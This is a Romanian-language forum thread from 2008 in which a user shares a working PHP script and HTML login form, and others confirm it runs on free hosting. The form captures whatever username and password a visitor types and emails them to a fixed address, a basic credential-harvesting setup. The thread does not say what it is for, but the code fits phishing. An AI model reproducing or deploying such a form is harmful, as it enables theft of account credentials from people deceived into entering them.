+icebird Posted February 7, 2008 Report Share Posted February 7, 2008 Am facut(editat) un mic script care trimite doua input-uri (username si password) pe mail.Ultima data cand am incercat a mers dar nu afisa datele,acum l-am refacut si sper sa mearga...imi puteti spune daca voua v-a mers ? login.php: <?php $user = $_POST["user"]; $parola = $_POST["parola"]; if (mail("adresa@domeniu.com", "Informatii $user", "User: $user ~ Parola: $parola")) { echo "E-Mail trimis!"; } else { echo "A aparut o eraore!"; } ?> formular.html: <html> <head> <title>Formular</title> </head> <body> <div align="center"> <form action="login.php" method="post" name="form1"> Utilizator: <input type="text" name="user" id="user" /><br> Parola: <input type="password" name="parola" id="parola" /><br> <input type="submit" value="Trimite!" /> </form> </div> </body> </html> EDIT : Am incercat adineauri si a mers.Gaby tie iti merge pe rom.0lx.net ? Intr-un sistem rudimentar ca inchizita, tratam fara respect politia ! Link to comment Share on other sites More sharing options...
eutu9 Posted February 7, 2008 Report Share Posted February 7, 2008 hmm... Din punct de vedere al sintaxei si al logicii scriptul este bun... nu inteleg cum a putut sa mearga intr-un moment si in altul nu... poate ai facut sa ii faci upload sau era o alta greseala! Scriptul e bun! Link to comment Share on other sites More sharing options...
+icebird Posted February 7, 2008 Author Report Share Posted February 7, 2008 Inainte era altceva..m-am grabit la editare..am schimbat numele variabilelor intr-un loc iar in altul am uitat si nu a mers ...acuma merge ! Closed Intr-un sistem rudimentar ca inchizita, tratam fara respect politia ! Link to comment Share on other sites More sharing options...
gaby Posted February 8, 2008 Report Share Posted February 8, 2008 nu, mie nu mi-a mers, imi afiseaza Email Trimis, dar nu vine nimic. probabil tot de la hosting tu ai incercat pe rom.0x.net ? Te-ai inregistrat? Ne-ar placea sa te prezinti. Cum pot sustine forumul? Cumpara de la eMag folosind acest link. -------------------- Link to comment Share on other sites More sharing options...
+icebird Posted February 8, 2008 Author Report Share Posted February 8, 2008 Da,si a mers,dar au venit cam intarziate mail-urile dar a mers,cu scriptu` din topicul asta ai incercat si nu a mers ? Intr-un sistem rudimentar ca inchizita, tratam fara respect politia ! Link to comment Share on other sites More sharing options...
gaby Posted February 8, 2008 Report Share Posted February 8, 2008 da, scuzele mele, m-am uitat acum pe seara si intr-adevar mail-urile au venit, m-am uitat imediat dupa ce am facut testul si nu venisera, dupa cum ai spus si tu au venit putin mai greu, oricum important este ca vin , multumesc mult de ajutor. Te-ai inregistrat? Ne-ar placea sa te prezinti. Cum pot sustine forumul? Cumpara de la eMag folosind acest link. -------------------- Link to comment Share on other sites More sharing options...
Recommended Posts